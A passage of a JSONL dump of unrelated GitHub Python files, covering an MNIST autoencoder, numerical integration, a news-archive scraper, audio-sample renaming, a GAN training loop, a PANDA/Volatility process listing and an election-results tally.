main(args)\n","repo_name":"mishab00/SearchHelper","sub_path":"SearchHelper.py","file_name":"SearchHelper.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"44395715083","text":"import torch\nimport numpy as np\nfrom book.pytorch.utils.helper import get_mnist_loader\nimport torch.nn.functional as F\nfrom torch import nn\nimport matplotlib.pyplot as plt\n\n\nclass AutoEncoder(nn.Module):\n def __init__(self, encoding_dim):\n super(AutoEncoder, self).__init__()\n # encoder - linear layer (784 -> encoding_dim)\n self.fc1 = nn.Linear(28 * 28, encoding_dim)\n\n # decoder - linear layer (encoding_dim -> input size)\n self.fc2 = nn.Linear(encoding_dim, 28 * 28)\n\n def forward(self, x):\n x = F.relu(self.fc1(x))\n x = torch.sigmoid(self.fc2(x)) # (sigmoid for scaling from 0 to 1)\n return x\n\n\nif __name__ == '__main__':\n \"\"\"\n the compressed representation often holds key information about an input image and we can use it for \n denoising images or oher kinds of reconstruction and transformation!\n \"\"\"\n batch_size = 20\n train_loader, test_loader, valid_loader = get_mnist_loader(batch_size=batch_size, is_norm=False)\n\n model = AutoEncoder(encoding_dim=32)\n print(model)\n\n \"\"\"comparing pixel values in input and output images, it's best to use a loss that meant for a regression task\"\"\"\n criterion = nn.MSELoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=0.001)\n\n n_epochs = 20\n for epoch in range(1, n_epochs + 1):\n train_loss = 0.0\n for data in train_loader:\n images, _ = data\n images = images.view(images.size(0), -1) # flatten images\n optimizer.zero_grad()\n outputs = model(images)\n loss = criterion(outputs, images)\n loss.backward()\n optimizer.step()\n train_loss += loss.item() * images.size(0)\n\n # print avg training statistics\n train_loss = train_loss / len(train_loader)\n print('Epoch: {} \\tTraining Loss: {:.6f}'.format(epoch, train_loss))\n\n # check test\n dataiter = iter(test_loader)\n images, labels = dataiter.next()\n\n images_flatten = images.view(images.size(0), -1)\n output = model(images_flatten)\n images = images.numpy()\n\n # output is resized into a batch of images\n output = output.view(batch_size, 1, 28, 28)\n # use detach when it's an output that requires_grad\n output = output.detach().numpy()\n\n # plot the first ten input images and then reconstructed images\n fig, axes = plt.subplots(nrows=2, ncols=10, sharex=True, sharey=True, figsize=(25, 4))\n\n # input images on top row, reconstructions on bottom\n for images, row in zip([images, output], axes):\n for img, ax in zip(images, row):\n ax.imshow(np.squeeze(img), cmap='gray')\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n plt.show()\n","repo_name":"jk983294/morph","sub_path":"book/pytorch/autoencoder/linear.py","file_name":"linear.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"25106887319","text":"\nimport numpy as np\nfrom numpy import sin, exp\nfrom tqdm import tqdm\n\n\n\n\n\nclass Integrate:\n def __init__(self, function):\n self.function = function\n self.error = 0\n self.sign = 1\n\n def double_integral(self, limit_list, precision=500):\n if type(limit_list) != list:\n raise IntegrationError(\"The bounds must be given as a list of lists\")\n x_list, y_list = limit_list\n (a, b), (c, d) = x_list, y_list\n x_points, y_points = (b - a) * 
precision, (d - c) * precision\n xs, ys = np.linspace(a, b, int(x_points)), np.linspace(c, d, int(y_points))\n integral = 0\n sub_sum = 0\n super_sum = 0\n for i in tqdm(range(len(xs) - 1)):\n delta_x = xs[i + 1] - xs[i]\n for j in range(len(ys) - 1):\n delta_y = ys[j + 1] - ys[j]\n delta = delta_x * delta_y\n try:\n f1 = self.function(xs[i], ys[j])\n sub_area = f1 * delta\n f2 = self.function(xs[i + 1], ys[j + 1])\n super_area = f2 * delta\n\n area = (f2 + f1) / 2 * delta\n integral += area\n sub_sum += sub_area\n super_sum += super_area\n except ZeroDivisionError:\n print(f\"\\nAvoided pole\\n\")\n\n self.error = super_sum - sub_sum\n return integral\n\n\n def integral(self, lower, upper, precision=10000):\n if lower > upper:\n lower, upper = upper, lower\n self.sign = -1\n number_of_points = (upper - lower) * precision\n xs = np.linspace(lower, upper, int(number_of_points))\n integral = 0\n super_sum = 0\n sub_sum = 0\n for index in tqdm(range(len(xs) - 1)):\n delta = xs[index + 1] - xs[index]\n try:\n y1 = self.function(xs[index])\n sub_area = y1 * delta\n y2 = self.function(xs[index + 1])\n super_area = y2 * delta\n\n area = (y2 + y1) / 2 * delta\n integral += area\n sub_sum += sub_area\n super_sum += super_area\n except ZeroDivisionError:\n print(f\"\\nAvoided pole\")\n\n self.error = super_sum - sub_sum\n return self.sign * integral\n\n\ndef simple_test(x):\n return sin(x) / x\n\nresult = Integrate(simple_test).integral(-1, 1)\nprint(result)\n\n\nclass IntegrationError(Exception):\n def __init__(self, *args):\n if args:\n self.message = args[0]\n else:\n self.message = None\n\n def __str__(self):\n if self.message:\n return self.message\n return \"Custom Error\"\n\n\n\n\n\n\n\n\ndef double_gaussian(x, y):\n return exp(-(x ** 2 + y ** 2))\n\n\n# Build an Integrate object\nintegral = Integrate(double_gaussian)\n\n# Calculate the integral\nresult = integral.double_integral([[-500, 500], [-500, 500]], precision=3 )\n\n# Show the result and the accuracy\nprint(\"The result is\", result)\n\n# Calculate the error range\nprint(\"\\nThe accuracy of this result is\", integral.error)","repo_name":"RashmitShrestha/mlModels","sub_path":"math.py","file_name":"math.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"31018022342","text":"import scrapy\n\nclass Spider(scrapy.Spider):\n name = \"article_spider\"\n\n\n start_urls = ['https://www.thehindu.com/archive/web/2009/08/15/']\n\n def parse(self, response):\n all_divs = response.css('.tpaper-container')\n all_sections = all_divs.css(\"section\")\n topics = ['bengaluru', 'chennai', 'international', 'thiruvananthapuram', 'vijayawada', 'visakhapatnam',\n 'national', 'andhra pradesh',\n 'karnataka', 'kerala', 'tamil nadu', 'other states', 'coimbatore', 'delhi', 'hyderabad']\n\n for sect in all_sections:\n temp = sect.css(\"h2::attr(id)\").extract_first()\n if temp in topics:\n arc_list = sect.css(\".archive-list\")\n all_headlines = arc_list.css(\"li\")\n for hd in all_headlines:\n child_links = hd.css('a::attr(href)')\n for clk in child_links:\n url = clk.get()\n ret_dict = {'Headline': hd.css('a::text').get()}\n req = scrapy.Request(url, callback=self.parse2, dont_filter=True)\n req.meta['item'] = ret_dict\n yield req\n\n def parse2(self, response2):\n ret_dict = response2.meta['item']\n date = response2.css('span[class=\"blue-color ksl-time-stamp\"]')\n date = date.css('none::text').get()\n txt = response2.css('.article')\n cont = 
txt.css('div::attr(id)').get()\n txt = txt.css('div[id='+cont+']')\n content = \"\"\n txt = txt.css('p::text')\n for t in txt:\n content = content + \" \" + t.get()\n ret_dict['Date'] = date.replace('\\n','')\n ret_dict['Text'] = content\n yield ret_dict\n","repo_name":"kushagragarwal2443/Web_Scraping_ISB","sub_path":"Scrapy/TOI/TOI/spiders/hindu.py","file_name":"hindu.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"27987323020","text":"import mimetypes\nimport re\n\nfrom pathlib import Path\n\nexec(open(\"./utils.py\").read())\nexec(open(\"./depop.py\").read())\n\n# TODO: separate files by name???\n# some sample sets contain multiple styles\n\n# TODO: remove non-musical audio files???\n# these might just be the ones with no note info...\n\ndef find_dynamic(path):\n # replace _ with - because _ is included in \\w\n cleaned_path = path.replace(\"_\",\" \")\n # tries to find dynamics and *not* notes\n # TODO: this struggles if dynamic is at the end\n match = re.search(r\"(\\b|\\W)(m?(f+|p+))[^#0-9](\\b|\\W)\", cleaned_path, flags=re.IGNORECASE)\n if match is None:\n return\n else:\n return match.group(2)\n\ndef is_audio(path):\n try:\n if \"audio\" in mimetypes.guess_type(path)[0]:\n return True\n else:\n return False\n except TypeError:\n # path is not a file\n return False\n\ndef convert(file, destination, dynamics_dict):\n # get the filename only\n filename = os.path.basename(file)\n # remove the extension\n filename = os.path.splitext(filename)[0]\n\n # get the note\n # NB: if this doesn't work well, there are fancier options like\n # https://github.com/mzucker/python-tuner/blob/master/tuner.py\n match = re.search(r\"[a-g]{1}[#b]?[0-9]{1}\", filename, flags=re.IGNORECASE)\n if match is None:\n # TODO: no note in filename\n # maybe these can be discarded in most cases?\n pass\n midival = str2midi(match.group(0))\n\n # TODO: velocity instead of dynamics?\n dynamic = find_dynamic(filename)\n if not dynamic:\n dynamics = 1\n dynamic = 1\n else:\n dynamics = len(dynamics_dict)\n dynamic = dynamics_dict[dynamic]\n\n release = 0\n seconds = 12\n\n # format filename, incrementing for variations\n variation = 1\n new_name = \"{}.{}.{}.{}.{}.wav\".format(midival,dynamic,dynamics,variation,release)\n output = destination + '/' + new_name\n while os.path.isfile(output):\n variation += 1\n new_name = \"{}.{}.{}.{}.{}.wav\".format(midival,dynamic,dynamics,variation,release)\n output = destination + '/' + new_name\n\n cmd = ['ffmpeg','-i',file,'-ac','2','-af','silenceremove=1:0:-60dB','-y',output]\n run(cmd)\n\n#######################################\n# Start here\n#######################################\n\nfolder = os.path.abspath(sys.argv[1])\n# TODO: allow setting output path\ndestination = sys.argv[2]\n\n# filter folder to just audio files (in any subfolder)\naudio_files = [x for x in list(Path(folder).rglob('*')) if is_audio(x)]\n\n# find the dynamics in the filenames\n# number of dynamics: len(dynamics)\ndynamics = set([find_dynamic(x.name) for x in audio_files])\n\ndynamics_dict = {}\nif len(dynamics) > 1:\n # create dynamics translation layer for this sample set\n translation_layer = {\n \"ppp\": 1,\n \"pp\": 2,\n \"p\": 3,\n \"mp\": 4,\n \"mf\": 5,\n \"f\": 6,\n \"ff\": 7,\n \"fff\": 8\n }\n\n # just keep the ones used by this sample set\n for d in dynamics:\n dynamics_dict[d] = translation_layer[d.lower()]\n\n # sort by value, going from ppp to fff\n t2 = 
dict(sorted(dynamics_dict.items(), key=lambda item: item[1]))\n\n # reassign dynamic values to the remaining dynamics\n # TODO: this is where velocity values could be assigned\n dynamic = 1\n for d in t2:\n dynamics_dict[d] = dynamic\n dynamic += 1\n\n# make sure destination exists\nif not os.path.exists(destination):\n os.makedirs(destination)\n\n# do the conversion\nfor file in tqdm(audio_files):\n convert(file, destination, dynamics_dict)\n","repo_name":"schollz/mx.samples","sub_path":"samples/convert_samples.py","file_name":"convert_samples.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"36"} +{"seq_id":"11887621910","text":"import csv\n\nimport matplotlib.animation as animation\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.integrate as integrate\nfrom scipy.spatial.distance import pdist, squareform\n\n\nclass Universe:\n def __init__(self):\n self.iter_cnt = 0\n self.iter_max = 0\n self.time_per_iter = 0.\n self.time_elapsed = 0.\n self.size = 0\n self.mass = []\n self.state = []\n\n # load init data\n with open('./data/init.csv', 'r') as init_f:\n reader = csv.reader(init_f)\n # data = list(reader)\n for i, row in enumerate(reader):\n if i == 0: # meta info\n self.size = int(row[0])\n self.time_per_iter = float(row[1])\n self.iter_max = int(row[2])\n continue\n self.mass.append(float(row[0]))\n self.state.append([float(i) for i in row[1:]])\n self.mass = np.asarray(self.mass)\n self.state = np.asarray(self.state)\n\n def step(self, dt):\n self.time_elapsed += dt\n # if it's time to fetch next iteration\n if self.time_elapsed >= self.time_per_iter:\n self.time_elapsed = 0.\n if self.iter_cnt < self.iter_max:\n with open('./data/' + str(self.iter_cnt) + '.csv', 'r') as f:\n reader = csv.reader(f)\n for i, row in enumerate(reader):\n for j, val in enumerate(row):\n self.state[i][j] = float(val)\n self.iter_cnt += 1\n else:\n print(\"Simulation finished!\")\n exit(0)\n else:\n self.state[:, :2] += dt * self.state[:, 2:]\n\n\nuni = Universe()\ndt = 1 / (uni.time_per_iter * 30) # this controls the speed\n\n# set up figure and animation\nfig = plt.figure()\nfig.subplots_adjust(left=0, right=1, bottom=0, top=1)\nax = fig.add_subplot(111, aspect='equal', autoscale_on=False,\n xlim=(-uni.size, uni.size), ylim=(-uni.size, uni.size))\n\n# planets holds the locations of the planets\nplanets, = ax.plot([], [], 'bo', ms=600)\n\n# rect is the universe edge\nrect = plt.Rectangle([-uni.size, -uni.size], 2 * uni.size, 2 *\n uni.size, ec='none', lw=2, fc='none')\nax.add_patch(rect)\n\n\ndef init():\n \"\"\"init animation\"\"\"\n global uni, rect\n planets.set_data([], [])\n rect.set_edgecolor('none')\n return planets, rect\n\n\ndef animate(i):\n \"\"\"perform animation step\"\"\"\n global uni, rect, dt, ax, fig\n uni.step(dt)\n\n ms = int(fig.dpi * 2 * (uni.size / 160) * fig.get_figwidth() /\n np.diff(ax.get_xbound())[0])\n\n # update pieces of the animation\n rect.set_edgecolor('k')\n # print(uni.state)\n planets.set_data(uni.state[:, 0], uni.state[:, 1])\n planets.set_markersize(ms)\n return planets, rect\n\n\nani = animation.FuncAnimation(\n fig, animate, frames=600, interval=10, blit=True, init_func=init)\n\nplt.show()\n","repo_name":"huyang531/BUPT-Course-Work","sub_path":"Parallel Computing/animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} 
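# Editor's note: a minimal, self-contained sketch (not one of the dataset
# records) of the matplotlib FuncAnimation pattern the animate.py record above
# relies on: init_func draws the empty frame, animate(i) updates the artists,
# and with blit=True both must return the artists they modified.
import matplotlib.pyplot as plt
import matplotlib.animation as animation

fig, ax = plt.subplots()
ax.set_xlim(0, 10)
ax.set_ylim(0, 10)
point, = ax.plot([], [], 'bo')

def init():
    point.set_data([], [])
    return point,

def animate(i):
    # move the marker along the diagonal, wrapping every 10 frames
    point.set_data([i % 10], [i % 10])
    return point,

ani = animation.FuncAnimation(fig, animate, frames=100, interval=50,
                              blit=True, init_func=init)
plt.show()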
+{"seq_id":"22869487796","text":"# When paused at a yield statement generator objects\n# can receive data by using .send() instead of .next().\n\n# When we use yield as an expression or assign it to a variable,\n# the value passed to .send() is available inside the generator.\n\n\ndef knock_knock():\n name = yield \"Who's there?\"\n yield \"%s who?\" % name\n yield \"That's not funny at all\"\n\n# We have to switch to manually calling .next() on our generator object,\n# because a for loop or function that takes an iterable\n# won't be able to call .send() when we need to.\n\nk = knock_knock()\nnext(k)\n# >>> \"Who's there?\"\n\n# At this point execution is paused at the first yield.\n# The assignment to the variable name hasn't happened yet.\n# But when we .send() a value execution continues:\n\nk.send(\"David\")\n# >>>'David who?'\n\n# In generator object we are at the second yield with \"David\" assigned to name.\n\n# If we send something to a yield that isn't being used as an expression,\n# the value we send will be ignored:\n\nk.send(\"David the environmentalist\")\n# >>>\"That's not funny at all\"\n\n# But execution continues the same as if we called .next()\n","repo_name":"DerevenetsArtyom/pure-python","sub_path":"generators/first_coroutine.py","file_name":"first_coroutine.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"38826344528","text":"from soul_link.wrappers.steam import get_app_details, get_app_id_from_store_url\n\n\ndef collect_steam_game_data(url: str) -> dict:\n \"\"\"\n Get Steam game store details.\n\n Args:\n url (str): URL where the Steam application ID will be gathered to collect game data.\n\n Returns:\n dict: the dictionary has the following keys:\n - name (str): Game name.\n - is_free (bool): `true` if the game is free, `false` otherwise.\n - short_description (str): Steam game short description.\n - categories (list[str]): list of game categories like `Single-Player`.\n - genres (list[str]): list of game genres like 'Strategy'.\n - release (bool): `true` if the game has been releashed, `false` otherwise.\n\n Raises:\n wrappers.steam.SteamInvalidStoreURL: Raised if the given `url` is not a valid Steam store URL.\n wrappers.steam.SteamInvalidAppID: Raised if the given `app_id` is not a valida number or equal or less than 0.\n requests.exceptions.ConnectionError: If the connection to steam can not be stablished.\n \"\"\"\n if not url.startswith(\"https://store.steampowered.com\"):\n print(\"Currently we only support Steam store URLs\")\n\n app_id = str(get_app_id_from_store_url(url))\n app_details = get_app_details(app_id)\n\n if app_id not in app_details or not app_details[app_id][\"success\"]:\n print(\"Game does not exist\")\n return\n\n app_details = app_details[app_id]\n return_details = {}\n return_details[\"name\"] = app_details[\"data\"][\"name\"]\n return_details[\"is_free\"] = app_details[\"data\"][\"is_free\"]\n return_details[\"short_description\"] = app_details[\"data\"][\"short_description\"]\n\n return_details[\"categories\"] = []\n for category in app_details[\"data\"][\"categories\"]:\n return_details[\"categories\"].append(category[\"description\"])\n\n return_details[\"genres\"] = []\n for genre in app_details[\"data\"][\"genres\"]:\n return_details[\"genres\"].append(genre[\"description\"])\n\n return_details[\"released\"] = False\n if (\n \"comin_soon\" not in app_details[\"data\"][\"release_date\"]\n and not 
app_details[\"data\"][\"release_date\"][\"coming_soon\"]\n ):\n return_details[\"released\"] = True\n return return_details\n","repo_name":"dloez/soul-link","sub_path":"soul_link/collect_game_data.py","file_name":"collect_game_data.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"40705712504","text":"import itertools\nimport sys\n\nsys.setrecursionlimit(10 ** 7)\ninput = sys.stdin.readline\n\nn = int(input())\na = [[0]*n for _ in range(n)] \nfor i in range(n):\n a[i] = list(map(int, input().split()))\n\nm = int(input())\nxy = [tuple(map(int,input().split())) for _ in range(m)]\ndislike_list = [[] for _ in range(n)]\nfor i, (x,y) in enumerate(xy):\n x, y = x - 1, y - 1\n dislike_list[x].append(y)\n dislike_list[y].append(x)\n\nans = float(\"inf\")\nfor order in itertools.permutations(list(range(n))):\n tmp = 0\n pre_runner = order[0]\n for leg, runner in enumerate(order):\n tmp += a[runner][leg]\n if runner in dislike_list[pre_runner]:\n break\n pre_runner = runner\n else:\n ans = min(ans, tmp)\n\nif ans == float(\"inf\"):\n ans = -1\n\nprint(ans)","repo_name":"hasesuns/atcoder","sub_path":"submitted/typical90/032.py","file_name":"032.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22804714695","text":"'''\nvolatility pslist two ways.\nBy: Luke Craig\n'''\n\nfrom pandare import Panda, blocking\nfrom sys import argv\nfrom time import time\nfrom volatility.framework.objects import utility\n\narch = \"x86_64\" if len(argv) <= 1 else argv[1]\nextra = \"-nographic -chardev socket,id=monitor,path=./monitor.sock,server,nowait -monitor chardev:monitor -serial telnet:127.0.0.1:4444,server,nowait\"\nqcow = \"/home/luke/workspace/qcows/instance-1.qcow2\"\npanda = Panda(arch=arch,qcow=qcow,extra_args=extra,mem=\"1G\")\n\ntimechange = 5\noldtime,oldtime2 = time(),time()\n\n'''\nIn on_asid_change we use the fast method. It gives us back the volatility symbols\nand we \"become\" the volatility plugin. The reason this is fast is because we clear\nthe cache between runs so we don't have to reconstruct the whole plugin again. This\nway we only have to run the 10+ second startup once.\n'''\n@panda.cb_asid_changed()\ndef on_asid_change(env, old_asid, new_asid):\n\tglobal oldtime\n\tif time() - oldtime > timechange:\n\t\tvmlinux = panda.get_volatility_symbols(debug=True)\n\t\tinit_task = vmlinux.object_from_symbol(symbol_name = \"init_task\")\n\t\tout = [(task.pid,task.parent.pid,utility.array_to_string(task.comm)) for task in init_task.tasks if task.pid]\n\t\tprint(\"PID\\tPPID\\tProcess Name\")\n\t\tfor task in out:\n\t\t\tprint(\"{}\\t{}\\t{}\".format(task[0],task[1],task[2]))\n\t\tprint(\"Number of tasks: \"+len(out))\n\t\toldtime = time()\n\treturn 0\n\n'''\nIn on_asid_change_slow we have an example where volatility will be run with the name\n(and arguments) desired and a dictionary of results will be be returned. This must\nre-construct the plugin and re-scan memory every time. 
It is quite slow.\n'''\n@panda.cb_asid_changed()\ndef on_asid_change_slow(env, old_asid, new_asid):\n\tglobal oldtime2\n\tif time() - oldtime2 > timechange:\n\t\ta = time()\n\t\tprint(panda.run_volatility(\"linux.pslist.PsList\"))\n\t\tran_in = time() - a\n\t\tprint(\"ran in \"+str(ran_in) + \" seconds\")\n\t\toldtime2 = time()\n\treturn 0\n\npanda.run()\n","repo_name":"panda-re/panda","sub_path":"panda/python/examples/experimental/volatility/vol_pslist.py","file_name":"vol_pslist.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":2347,"dataset":"github-code","pt":"19"} +{"seq_id":"11895368749","text":"import os\nimport sys\nimport csv\nimport argparse\nimport tensorflow as tf\nfrom tensorflow import GradientTape\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.losses import BinaryCrossentropy\nfrom tensorflow.keras.utils import normalize\nfrom tensorflow.image import rgb_to_grayscale, resize\n\n\nclass TrainGAN():\n\n    def __init__(self, args):\n        # import classes\n        sys.path.append(\"..\")\n        from preprocessing.process_vids import ProcessVids\n        from models.generator import Generator\n        from models.realism_discriminator import RealismDiscriminator\n        from models.feature_pose import FeaturePose\n        # initialize training variables\n        self.numEpochs = args.numEpochs\n        self.threadNum = args.threadNum\n\n        self.genOptimizer = Adam(args.lr)\n        self.realismOptimizer = Adam(args.lr)\n\n        self.genLoss = self.realismLoss = None\n\n        self.crossEntropy = BinaryCrossentropy(from_logits=True)\n\n        # initialize preprocessor and build/load data\n        preprocessor = ProcessVids(args.rawDir, args.proDir,\n                                   args.batchSize, args.valSize,\n                                   args.threadNum, args.preFetch)\n        self.trainData, self.valData = preprocessor.loadData()\n\n        # initialize models\n        self.generator = Generator()\n        self.realism = RealismDiscriminator()\n        self.featurePose = FeaturePose()\n\n        # initialize checkpoints and managers\n        if not args.restore:\n            for f in os.listdir('data/checkpoints/generator'):\n                os.remove('data/checkpoints/generator/' + f)\n            for f in os.listdir('data/checkpoints/realism_discriminator'):\n                os.remove('data/checkpoints/realism_discriminator/' + f)\n            for f in os.listdir('data/checkpoints/feature_pose'):\n                os.remove('data/checkpoints/feature_pose/' + f)\n\n        self.checkpointG = tf.train.Checkpoint(optimizer=self.genOptimizer,\n                                               model=self.generator)\n        self.managerG = tf.train.CheckpointManager(self.checkpointG,\n                                                   directory='data/checkpoints/generator',\n                                                   max_to_keep=5, keep_checkpoint_every_n_hours=2)\n\n        self.checkpointR = tf.train.Checkpoint(optimizer=self.realismOptimizer,\n                                               model=self.realism)\n        self.managerR = tf.train.CheckpointManager(self.checkpointR,\n                                                   directory='data/checkpoints/realism_discriminator',\n                                                   max_to_keep=5, keep_checkpoint_every_n_hours=2)\n\n        if os.path.isfile('data/checkpoints/gan_losses.csv'):\n            os.remove('data/checkpoints/gan_losses.csv')\n\n    def _generatorLoss(self, x):\n        return self.crossEntropy(tf.ones_like(x), x)\n\n    def _realismLoss(self, realOut, fakeOut):\n        realLoss = self.crossEntropy(tf.ones_like(realOut), realOut)\n        fakeLoss = self.crossEntropy(tf.zeros_like(fakeOut), fakeOut)\n        return realLoss + fakeLoss\n\n    def _compareFeatures(self, x, y):\n        x = normalize(x)\n        y = normalize(y)\n        diff = tf.math.subtract(x, y)\n        diff = tf.math.abs(diff)\n        diff = tf.math.reduce_mean(diff)\n        return self.crossEntropy(tf.zeros_like(diff), diff)\n\n    def _logTrain(self, epoch):\n        msg = 'Training Epoch {}, Generator Loss: {}, Discriminator Loss: {}'\n        print(msg.format(epoch + 1, self.genLoss, self.realismLoss), end='\\r')\n\n    def _logVal(self, epoch):\n        msg = 'Validating Epoch {}, Generator Loss: {}, Discriminator Loss: {}'\n        print(msg.format(epoch + 1, self.genLoss, self.realismLoss), end='\\r')\n\n    def _save(self):\n        self.managerG.save()\n        self.managerR.save()\n        with open('data/checkpoints/gan_losses.csv', 'a', newline='') as file:\n            writer = csv.writer(file)\n            writer.writerow([self.genLoss, self.realismLoss])\n\n    def _greyscale(self, image):\n        image = resize(image, (96, 96))\n        image = rgb_to_grayscale(image)\n        return image\n\n    @tf.function\n    def _validate(self, inputA, inputB):\n        generated = self.generator.call(inputA, inputB, training=True)\n\n        realismReal = self.realism.call(inputA, training=True)\n        realismFake = self.realism.call(generated, training=True)\n\n        genLossR = self._generatorLoss(realismFake)\n\n        self.realismLoss = self._realismLoss(realismReal, realismFake)\n\n        # match the greyscale preprocessing used in _update\n        featuresSource = self.featurePose.call(self._greyscale(inputB))\n        featuresGen = self.featurePose.call(self._greyscale(generated))\n\n        featureLoss = self._compareFeatures(featuresSource, featuresGen)\n\n        genLossS = self._generatorLoss(featureLoss)\n\n        self.genLoss = (genLossR + genLossS) / 2\n\n    @tf.function\n    def _update(self, inputA, inputB):\n        with GradientTape() as genTape, GradientTape() as realismTape:\n            generated = self.generator.call(inputA, inputB, training=True)\n\n            realismReal = self.realism.call(inputA, training=True)\n            realismFake = self.realism.call(generated, training=True)\n\n            genLossR = self._generatorLoss(realismFake)\n\n            self.realismLoss = self._realismLoss(realismReal, realismFake)\n\n            featuresSource = self.featurePose.call(self._greyscale(inputB))\n            featuresGen = self.featurePose.call(self._greyscale(generated))\n\n            featureLoss = self._compareFeatures(featuresSource, featuresGen)\n\n            genLossS = self._generatorLoss(featureLoss)\n\n            self.genLoss = (genLossR + genLossS) / 2\n\n        genGradients = genTape.gradient(self.genLoss, self.generator.trainable_variables)\n        realismGradients = realismTape.gradient(\n            self.realismLoss, self.realism.trainable_variables)\n\n        self.genOptimizer.apply_gradients(zip(genGradients, self.generator.trainable_variables))\n        self.realismOptimizer.apply_gradients(\n            zip(realismGradients, self.realism.trainable_variables))\n\n    def train(self):\n        self.checkpointG.restore(self.managerG.latest_checkpoint)\n        self.checkpointR.restore(self.managerR.latest_checkpoint)\n\n        for epoch in range(self.numEpochs):\n            for inputA, inputB in self.trainData:\n                self._update(inputA, inputB)\n                self._logTrain(epoch)\n            print('')\n            for inputA, inputB in self.valData:\n                self._validate(inputA, inputB)\n                self._logVal(epoch)\n\n            print('Epoch {} complete'.format(epoch + 1))\n            self.trainData = self.trainData.shuffle(self.threadNum)\n            self.valData = self.valData.shuffle(self.threadNum)\n\n            self._save()\n\n\nif __name__ == '__main__':\n    def str2bool(v):\n        return v.lower() in (\"yes\", \"true\", \"t\", \"1\")\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--numEpochs', default=100, type=int)\n    parser.add_argument('--lr', default=1e-4, type=float)\n    parser.add_argument('--rawDir', default='data/raw/faces', type=str)\n    parser.add_argument('--proDir', default='data/processed/faces', type=str)\n    parser.add_argument('--batchSize', default=32, type=int)\n    parser.add_argument('--preFetch', default=1, type=int)\n    parser.add_argument('--valSize', default=1000, type=int)\n    parser.add_argument('--threadNum', default=4, type=int)\n    parser.add_argument('--restore', default=True, type=str2bool)\n    args = parser.parse_args()\n\n    train = TrainGAN(args)\n    
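# NOTE (editor's comment, not in the original): train() restores the latest\n    # generator/discriminator checkpoints before looping, so interrupted runs\n    # resume where they left off; pass --restore false to clear\n    # data/checkpoints/* in __init__ and start from scratch.\n    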
train.train()\n","repo_name":"aaronlockhartdev/deepfakeGAN","sub_path":"actuation/train_gan.py","file_name":"train_gan.py","file_ext":"py","file_size_in_byte":7535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"10236967437","text":"\"\"\"client status parse config\"\"\"\n\n# -*- coding:utf-8 -*-\n\n\nclass StatusParseConfig:\n    \"\"\"Status-data parser configuration\\n\n    datamatcher: the data matcher\"\"\"\n\n    def __init__(self, exts: dict):\n        if not isinstance(exts, dict) or len(exts) < 1:\n            raise Exception(\"Invalid param 'exts' for StatusParseConfig\")\n        self._exts: dict = {}\n        for e, t in exts.items():\n            if not isinstance(e, str) or e == \"\":\n                continue\n            if not isinstance(t, type):\n                continue\n            e = e.strip().lstrip('.')\n            if e not in self._exts:\n                self._exts[e] = t\n","repo_name":"Octoberr/sspywork","sub_path":"savecode/threeyears/idownserver/statusmantainer/statusparseconfig.py","file_name":"statusparseconfig.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"23131700405","text":"#!/usr/bin/env python\n# Modules\nimport os, sys\nfrom wsgiref.simple_server import sys_version\nimport requests\nimport csv\n\n__author__ = \"Audrey Monjaras\"\n__credits__ = \"Audrey Monjaras\"\n__version__ = \"1.0.0\"\n__status__ = \"Development\"\n\n# Assign a variable for the file to load and the path\ncsvpath = os.path.join(\"Resources\", \"election_results.csv\")\n\n# Assign a variable to save the file to a path\ntxtcreate = os.path.join(\"analysis\", \"election_analysis_practice.txt\")\n\n# Initialize a total vote counter\ntotal_votes = 0\n\n# Candidate Options and Candidate Votes\ncandidate_options = []\ncandidate_votes = {}\n\n# Winning Candidate and Winning Count Tracker\nwinning_candidate = \"\"\nwinning_count = 0\nwinning_percentage = 0\n\n# Open the election results and read the file\nwith open(csvpath) as election_data:\n\n    # Read the file object with the reader function\n    csvreader = csv.reader(election_data)\n\n    # Read the header row\n    headers = next(csvreader)\n    \n    # Print each row in the CSV file\n    for row in csvreader:\n        # Add to the total vote count.\n        total_votes += 1\n        # Get the candidate name for each row\n        candidate_name = row[2]\n        \n        # Add the candidate name to the candidate list\n        if candidate_name not in candidate_options:\n            # Add it to the list of candidates\n            candidate_options.append(candidate_name)\n            # Begin tracking that candidate's vote count\n            candidate_votes[candidate_name] = 0\n        # Add votes to each candidate\n        candidate_votes[candidate_name] += 1\n\n# Saving the results to a text file\nwith open(txtcreate, \"w\") as txt_file:\n\n    # Print final count to terminal\n    election_results = (\n        f\"\\nElection Results\\n\"\n        f\"----------------------\\n\"\n        f\"Total Votes: {total_votes:,}\\n\"\n        f\"-----------------------\\n\" )\n    print(election_results, end=\"\")\n\n    # Save the final vote count to the text file\n    txt_file.write(election_results)\n\n    # Percentage of votes for each candidate by looping through the counts\n    # Iterate through 